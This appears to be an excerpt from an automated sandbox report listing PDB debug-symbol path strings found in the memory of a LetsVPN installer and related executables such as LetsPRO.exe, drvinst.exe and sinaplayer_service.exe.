              Source: Binary string: C:\Users\winsign\samuli\source\repos\tap-windows6\src\x64\Release\tap0901.pdb source: letsvpn-latest.exe, 00000015.00000003.2342568479.0000000003106000.00000004.00000020.00020000.00000000.sdmp, drvinst.exe, 00000026.00000003.2627038541.000001CC02F6C000.00000004.00000020.00020000.00000000.sdmp, drvinst.exe, 00000027.00000003.2646713593.000001FA98EA4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\obj\Squirrel\Release\net45\Squirrel.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2393237093.0000000003106000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Configuration.ConfigurationManager/net461-windows-Release/System.Configuration.ConfigurationManager.pdb source: letsvpn-latest.exe, 00000015.00000003.2402252974.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Console\4.0.2.0\System.Console.pdb source: letsvpn-latest.exe, 00000015.00000003.2403088896.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Memory\netfx\System.Memory.pdb source: letsvpn-latest.exe, 00000015.00000003.2441458716.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ComponentModel.EventBasedAsync\4.0.11.0\System.ComponentModel.EventBasedAsync.pdb source: letsvpn-latest.exe, 00000015.00000003.2399584071.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection.Primitives\4.0.1.0\System.Reflection.Primitives.pdb$*>* 0*_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2458361290.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\65\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.IO.Pipes.AccessControl/netfx\System.IO.Pipes.AccessControl.pdb/5I5 ;5_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2433009064.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.TraceSource\4.0.2.0\System.Diagnostics.TraceSource.pdb source: letsvpn-latest.exe, 00000015.00000003.2420126748.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.UnmanagedMemoryStream\4.0.3.0\System.IO.UnmanagedMemoryStream.pdb source: letsvpn-latest.exe, 00000015.00000003.2435251638.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Timer\4.0.1.0\System.Threading.Timer.pdbt( source: letsvpn-latest.exe, 00000015.00000003.2501476791.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\symbols\pdb\obj\Release\net40\Mono.Cecil.Pdb.pdb source: letsvpn-latest.exe, 00000015.00000003.2377740125.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: InternalNameMono.Cecil.Pdb.dllf! source: letsvpn-latest.exe, 00000015.00000003.2377740125.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\LetsVPNInfraStructure\obj\Release\LetsVPNInfraStructure.pdb source: letsvpn-latest.exe, 00000015.00000003.2365820399.0000000003107000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003D.00000002.3417897670.00000000060D2000.00000002.00000001.01000000.00000025.sdmp
              Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.CompilerServices.Unsafe\net461-Release\System.Runtime.CompilerServices.Unsafe.pdbBSJB source: letsvpn-latest.exe, 00000015.00000003.2462305635.000000000310C000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003D.00000002.3417027693.00000000058E2000.00000002.00000001.01000000.00000023.sdmp
              Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdbSHA256xpRb source: letsvpn-latest.exe, 00000015.00000003.2385172064.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Data.OleDb/net461-windows-Release/System.Data.OleDb.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2406641167.0000000003106000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Microsoft.IdentityModel.pdb source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Security\4.0.2.0\System.Net.Security.pdb source: letsvpn-latest.exe, 00000015.00000003.2452861918.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.NetTcp.Facade/Release/net461/System.ServiceModel.NetTcp.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2486208547.000000000310D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\GitWorkspace\AvalonEdit\ICSharpCode.AvalonEdit\obj\Release\net45\ICSharpCode.AvalonEdit.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2352114533.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: WebView2Loader.dll.pdb}> source: letsvpn-latest.exe, 00000015.00000003.2549736766.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Numerics\4.0.1.0\System.Runtime.Numerics.pdb source: letsvpn-latest.exe, 00000015.00000003.2466277974.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.IO.Compression/netfx\System.IO.Compression.pdb source: letsvpn-latest.exe, 00000015.00000003.2426450844.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\symbols\mdb\obj\Release\net40\Mono.Cecil.Mdb.pdbSHA256_- source: letsvpn-latest.exe, 00000015.00000003.2376938176.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\IEUser\pusher-websocket-dotnet\PusherClient\obj\release\net46\PusherClient.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2381608570.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XmlSerializer\4.0.11.0\System.Xml.XmlSerializer.pdb source: letsvpn-latest.exe, 00000015.00000003.2509600299.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Threading.AccessControl/net461-windows-Release/System.Threading.AccessControl.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2492363095.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ComponentModel.TypeConverter\4.1.2.0\System.ComponentModel.TypeConverter.pdb source: letsvpn-latest.exe, 00000015.00000003.2400835313.000000000310D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Handles\4.0.1.0\System.Runtime.Handles.pdb,)F) 8)_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2464168629.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection.Extensions\4.0.1.0\System.Reflection.Extensions.pdb source: letsvpn-latest.exe, 00000015.00000003.2457911056.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.AccessControl/net461-windows-Release/System.Security.AccessControl.pdb source: letsvpn-latest.exe, 00000015.00000003.2470703706.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.AppContext\4.1.2.0\System.AppContext.pdb source: letsvpn-latest.exe, 00000015.00000003.2394362077.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\Utils\obj\Release\Utils.pdb source: letsvpn-latest.exe, 00000015.00000003.2511835079.0000000003107000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000002.2707489755.0000000002AE2000.00000002.00000001.01000000.0000001B.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Collections.Concurrent\4.0.11.0\System.Collections.Concurrent.pdb source: letsvpn-latest.exe, 00000015.00000003.2396511276.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.NetworkInformation\4.1.2.0\System.Net.NetworkInformation.pdb source: letsvpn-latest.exe, 00000015.00000003.2449881395.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Mono.Cecil.Pdb source: letsvpn-latest.exe, 00000015.00000003.2377740125.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ZMono.Cecil.Pdb, PublicKey=00240000048000009400000006020000002400005253413100040000010001002b5c9f7f04346c324a3176f8d3ee823bbf2d60efdbc35f86fd9e65ea3e6cd11bcdcba3a353e55133c8ac5c4caaba581b2c6dfff2cc2d0edc43959ddb86b973300a479a82419ef489c3225f1fe429a708507bd515835160e10bc743d20ca33ab9570cfd68d479fcf0bc797a763bec5d1000f0159ef619e709d915975e87beebaf source: letsvpn-latest.exe, 00000015.00000003.2379243714.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ObjectModel\4.0.11.0\System.ObjectModel.pdb source: letsvpn-latest.exe, 00000015.00000003.2457151708.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Globalization.Extensions/netfx\System.Globalization.Extensions.pdb source: letsvpn-latest.exe, 00000015.00000003.2424368013.000000000310D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\cb\bld\bin\e_sqlite3\win\v141\plain\x86\e_sqlite3.pdb source: letsvpn-latest.exe, 00000015.00000003.2547019952.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.CompilerServices.VisualC\4.0.2.0\System.Runtime.CompilerServices.VisualC.pdb source: letsvpn-latest.exe, 00000015.00000003.2463035170.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\SDK\AppCenterAnalytics\Microsoft.AppCenter.Analytics.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Analytics.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2367415267.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\WorkShop\WebSocket4Net\WebSocket4Net\obj\Release\WebSocket4Net.pdb source: letsvpn-latest.exe, 00000015.00000003.2512523323.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Tasks\4.0.11.0\System.Threading.Tasks.pdb source: letsvpn-latest.exe, 00000015.00000003.2495009725.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.ReaderWriter\4.1.1.0\System.Xml.ReaderWriter.pdb source: letsvpn-latest.exe, 00000015.00000003.2505407844.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Serialization.Formatters\4.0.2.0\System.Runtime.Serialization.Formatters.pdb source: letsvpn-latest.exe, 00000015.00000003.2466940913.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Pkcs/net461-windows-Release/System.Security.Cryptography.Pkcs.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2478524484.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Tasks.Parallel\4.0.1.0\System.Threading.Tasks.Parallel.pdb source: letsvpn-latest.exe, 00000015.00000003.2494267945.000000000310B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/CommunityToolkit.Mvvm/obj/Release/netstandard2.0/CommunityToolkit.Mvvm.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2347348631.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\SDK\AppCenter\Microsoft.AppCenter.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.pdb source: letsvpn-latest.exe, 00000015.00000003.2369093669.000000000310B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.WebSockets.Client\4.0.2.0\System.Net.WebSockets.Client.pdb source: letsvpn-latest.exe, 00000015.00000003.2455072468.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Web.Services.Description/Release/net461/System.Web.Services.Description.pdbSHA256aP source: letsvpn-latest.exe, 00000015.00000003.2503983529.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceProcess.ServiceController/net461-windows-Release/System.ServiceProcess.ServiceController.pdb source: letsvpn-latest.exe, 00000015.00000003.2488820018.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.IO.FileSystem.AccessControl/net461-Windows_NT-Release/System.IO.FileSystem.AccessControl.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2427249468.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem\4.0.3.0\System.IO.FileSystem.pdb source: letsvpn-latest.exe, 00000015.00000003.2430089756.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\sharpcompress\src\SharpCompress\obj\Release\net45\SharpCompress.pdbL source: letsvpn-latest.exe, 00000015.00000003.2388904149.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Mono.Cecil.Pdb.dll source: letsvpn-latest.exe, 00000015.00000003.2377740125.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: e:\ExpressionRTM\Sparkle\SDK\BlendWPFSDK\Build\Intermediate\Release\Libraries\Microsoft.Expression.Interactions\Win32\Release\Microsoft.Expression.Interactions.pdb source: letsvpn-latest.exe, 00000015.00000003.2370586402.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Data.OleDb/net461-windows-Release/System.Data.OleDb.pdb source: letsvpn-latest.exe, 00000015.00000003.2406641167.0000000003106000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Win32.Registry.AccessControl/net461-windows-Release/Microsoft.Win32.Registry.AccessControl.pdbSHA256a? source: letsvpn-latest.exe, 00000015.00000003.2374971901.000000000310C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\LetsVPNDomainModel\obj\Release\LetsVPNDomainModel.pdb source: letsvpn-latest.exe, 00000015.00000003.2365247282.0000000003100000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000002.2707740926.0000000002B62000.00000002.00000001.01000000.0000001D.sdmp
              Source: Binary string: e:\ExpressionRTM\Sparkle\SDK\BlendWPFSDK\Build\Intermediate\Release\Libraries\System.Windows.Interactivity\Win32\Release\System.Windows.Interactivity.pdb source: letsvpn-latest.exe, 00000015.00000003.2504717973.0000000003106000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ComponentModel\4.0.1.0\System.ComponentModel.pdb source: letsvpn-latest.exe, 00000015.00000003.2401491656.000000000310B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\playercode\branches\branch\bin\Release\sinaplayer_service.pdb source: sinaplayer_service.exe, 00000013.00000000.2209995817.000000000053D000.00000002.00000001.01000000.0000000B.sdmp, sinaplayer_service.exe, 00000013.00000002.3388043166.000000000053D000.00000002.00000001.01000000.0000000B.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Primitives.Facade/Release/net461/System.ServiceModel.Primitives.pdbSHA256a3 source: letsvpn-latest.exe, 00000015.00000003.2486911961.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Handles\4.0.1.0\System.Runtime.Handles.pdb source: letsvpn-latest.exe, 00000015.00000003.2464168629.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Text.Encoding.CodePages/net461-windows-Release/System.Text.Encoding.CodePages.pdbSHA256K source: letsvpn-latest.exe, 00000015.00000003.2489791226.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\third_party\edge_webview2\win\webview2_api_writer\dotNetAPIWrapper\Microsoft.Web.WebView2.Core\bin\ReleasePackage\Microsoft.Web.WebView2.Core.pdb source: letsvpn-latest.exe, 00000015.00000003.2372287144.000000000310B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.AccessControl/net461-windows-Release/System.Security.AccessControl.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2470703706.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\39\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Numerics.Vectors/net46\System.Numerics.Vectors.pdb source: letsvpn-latest.exe, 00000015.00000003.2456485776.0000000003103000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.Pipes\4.0.2.0\System.IO.Pipes.pdb source: letsvpn-latest.exe, 00000015.00000003.2433680162.000000000310B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Data.Odbc/net461-windows-Release/System.Data.Odbc.pdbSHA256x source: letsvpn-latest.exe, 00000015.00000003.2405745648.000000000310B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\rocks\obj\Release\net40\Mono.Cecil.Rocks.pdb source: letsvpn-latest.exe, 00000015.00000003.2378324686.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Primitives\4.0.11.0\System.Net.Primitives.pdbH,b, T,_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2451484814.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/net461-windows-Release/System.Security.Cryptography.ProtectedData.pdb source: letsvpn-latest.exe, 00000015.00000003.2479924642.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Security.SecureString/netfx\System.Security.SecureString.pdb source: letsvpn-latest.exe, 00000015.00000003.2484061202.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.IO.Ports/net461-windows-Release/System.IO.Ports.pdb source: letsvpn-latest.exe, 00000015.00000003.2434348436.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Security.Facade/Release/net461/System.ServiceModel.Security.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2487551781.0000000003103000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\65\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.IO.Pipes.AccessControl/netfx\System.IO.Pipes.AccessControl.pdb source: letsvpn-latest.exe, 00000015.00000003.2433009064.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ComponentModel.Primitives\4.1.2.0\System.ComponentModel.Primitives.pdbd+~+ p+_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2400273396.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\rocks\obj\Release\net40\Mono.Cecil.Rocks.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2378324686.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Dynamic.Runtime\4.0.11.0\System.Dynamic.Runtime.pdb source: letsvpn-latest.exe, 00000015.00000003.2422926242.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XDocument\4.0.11.0\System.Xml.XDocument.pdb source: letsvpn-latest.exe, 00000015.00000003.2506456728.0000000003103000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Syndication/net461-Release/System.ServiceModel.Syndication.pdbSHA256Uu source: letsvpn-latest.exe, 00000015.00000003.2488139644.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading\4.0.11.0\System.Threading.pdb source: letsvpn-latest.exe, 00000015.00000003.2502595833.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.Compression.ZipFile\4.0.3.0\System.IO.Compression.ZipFile.pdb source: letsvpn-latest.exe, 00000015.00000003.2425718257.0000000003106000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: letsvpn-latest.exe, 00000015.00000003.2380231891.0000000003105000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000002.2711648046.0000000005742000.00000002.00000001.01000000.0000001E.sdmp
              Source: Binary string: /_/artifacts/obj/System.Threading.AccessControl/net461-windows-Release/System.Threading.AccessControl.pdb source: letsvpn-latest.exe, 00000015.00000003.2492363095.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.FileVersionInfo\4.0.2.0\System.Diagnostics.FileVersionInfo.pdb source: letsvpn-latest.exe, 00000015.00000003.2411480070.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.WebHeaderCollection\4.0.1.0\System.Net.WebHeaderCollection.pdb source: letsvpn-latest.exe, 00000015.00000003.2454389741.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Text.Encoding.Extensions\4.0.11.0\System.Text.Encoding.Extensions.pdb source: letsvpn-latest.exe, 00000015.00000003.2490411396.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.CompilerServices.Unsafe\net461-Release\System.Runtime.CompilerServices.Unsafe.pdb source: letsvpn-latest.exe, 00000015.00000003.2462305635.000000000310C000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003D.00000002.3417027693.00000000058E2000.00000002.00000001.01000000.00000023.sdmp
              Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.provider.dynamic_cdecl\obj\Release\netstandard2.0\SQLitePCLRaw.provider.dynamic_cdecl.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2386682491.0000000003104000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003D.00000002.3444226642.00000000590F2000.00000002.00000001.01000000.0000002F.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Collections.Specialized\4.0.3.0\System.Collections.Specialized.pdb source: letsvpn-latest.exe, 00000015.00000003.2397620322.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\MdXaml\artifacts\obj\MdXaml\Release\net45\MdXaml.pdb source: letsvpn-latest.exe, 00000015.00000003.2366742475.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\vendor\nuget\src\Core\obj\Release\NuGet.Squirrel.pdb source: letsvpn-latest.exe, 00000015.00000003.2381179821.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Mono.Cecil.PdbG source: letsvpn-latest.exe, 00000015.00000003.2377740125.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\PowerShellStandard\src\5\obj\Release\net452\System.Management.Automation.pdbSHA2569v'` source: letsvpn-latest.exe, 00000015.00000003.2439963735.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Collections.NonGeneric\4.0.3.0\System.Collections.NonGeneric.pdb source: letsvpn-latest.exe, 00000015.00000003.2397242328.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\WorkShop\SuperSocket.Clientuser\obj\Release\SuperSocket.Clientuser.pdb source: letsvpn-latest.exe, 00000015.00000003.2393796689.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.nativelibrary\obj\Release\netstandard2.0\SQLitePCLRaw.nativelibrary.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2386047500.0000000003101000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003D.00000002.3443817207.00000000590B2000.00000002.00000001.01000000.0000002D.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Win32.Registry/net461-Windows_NT-Release/Microsoft.Win32.Registry.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2375723278.000000000310B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/Microsoft.Toolkit.Uwp.Notifications/obj/Release/net461/Microsoft.Toolkit.Uwp.Notifications.pdb source: letsvpn-latest.exe, 00000015.00000003.2371393124.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: OriginalFilenameMono.Cecil.Pdb.dll6 source: letsvpn-latest.exe, 00000015.00000003.2377740125.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: c:\Users\Todd\Source\Repos\DeltaCompressionDotNet\DeltaCompressionDotNet.MsDelta\obj\Release\DeltaCompressionDotNet.MsDelta.pdb source: letsvpn-latest.exe, 00000015.00000003.2347762405.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Win32.SystemEvents/net461-Release/Microsoft.Win32.SystemEvents.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2376355832.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdb source: letsvpn-latest.exe, 00000015.00000003.2385172064.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Permissions/net461-windows-Release/System.Security.Permissions.pdb source: letsvpn-latest.exe, 00000015.00000003.2482115637.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\39\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.ComponentModel.Annotations/netfx\System.ComponentModel.Annotations.pdb source: letsvpn-latest.exe, 00000015.00000003.2399020374.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Primitives\4.0.11.0\System.Net.Primitives.pdb source: letsvpn-latest.exe, 00000015.00000003.2451484814.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem.Watcher\4.0.2.0\System.IO.FileSystem.Watcher.pdb source: letsvpn-latest.exe, 00000015.00000003.2429279353.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.nativelibrary\obj\Release\netstandard2.0\SQLitePCLRaw.nativelibrary.pdb source: letsvpn-latest.exe, 00000015.00000003.2386047500.0000000003101000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003D.00000002.3443817207.00000000590B2000.00000002.00000001.01000000.0000002D.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin\obj\Windows_NT.AnyCPU.Release\System.Runtime.InteropServices.RuntimeInformation\net462\System.Runtime.InteropServices.RuntimeInformation.pdb source: letsvpn-latest.exe, 00000015.00000003.2464968959.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\LetsVPN\obj\Release\LetsPRO.pdb source: letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.Reader\4.0.2.0\System.Resources.Reader.pdb source: letsvpn-latest.exe, 00000015.00000003.2459711071.0000000003104000.00000004.00000020.00020000.00000000.sdmp
